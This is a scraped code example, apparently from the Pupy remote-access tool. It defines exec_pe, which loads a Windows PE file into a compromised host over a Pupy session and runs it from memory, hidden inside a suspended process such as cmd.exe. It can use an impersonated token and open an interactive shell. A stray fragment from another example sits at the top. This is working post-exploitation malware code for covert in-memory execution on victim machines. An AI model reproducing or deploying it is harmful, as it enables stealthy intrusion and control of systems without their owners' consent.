        with redirected_stdio(self.client.conn):
            self.client.conn.modules['pupwinutils.drives'].list_drives()
Esempio n. 34
0
def exec_pe(module,
            prog_args,
            path=None,
            raw_pe=None,
            interactive=False,
            fork=False,
            timeout=None,
            use_impersonation=False,
            suspended_process="cmd.exe"):
    if not raw_pe and not path:
        raise Exception("raw_pe or path must be supplied")
    if path:
        pe_arch = get_pe_arch(path)
        proc_arch = module.client.desc["proc_arch"]
        if pe_arch != proc_arch:
            module.error(
                "%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"
                % (path, pe_arch, proc_arch, proc_arch, pe_arch))
            return
    wait = True
    redirect_stdio = True
    if fork:
        wait = False
        redirect_stdio = False
    if not raw_pe:
        raw_pe = b""
        with open(path, 'rb') as f:
            raw_pe = f.read()
    module.client.load_package("pupymemexec")
    module.client.load_package("pupwinutils.memexec")

    res = ""
    dupHandle = None
    if use_impersonation:
        dupHandle = module.client.impersonated_dupHandle
        if dupHandle is None:
            module.error(
                "No token has been impersonated on this session. use impersonate module first"
            )
            return
    if not hasattr(module, 'mp'):
        setattr(module, 'mp', None)
    module.mp = module.client.conn.modules['pupwinutils.memexec'].MemoryPE(
        raw_pe,
        args=prog_args,
        hidden=True,
        redirect_stdio=redirect_stdio,
        suspended_process=suspended_process,
        dupHandle=dupHandle)
    with redirected_stdio(module.client.conn):
        module.mp.run()
    if not fork:
        if interactive:
            try:
                with redirected_stdio(module.client.conn):
                    module.mp.get_shell()
            finally:
                module.mp.close()
        else:
            starttime = time.time()
            while True:
                if module.mp.wait(1):
                    break
                if timeout:
                    if time.time() - starttime > timeout:
                        break
            module.mp.close()
            res = module.mp.get_stdout()
            module.log(res)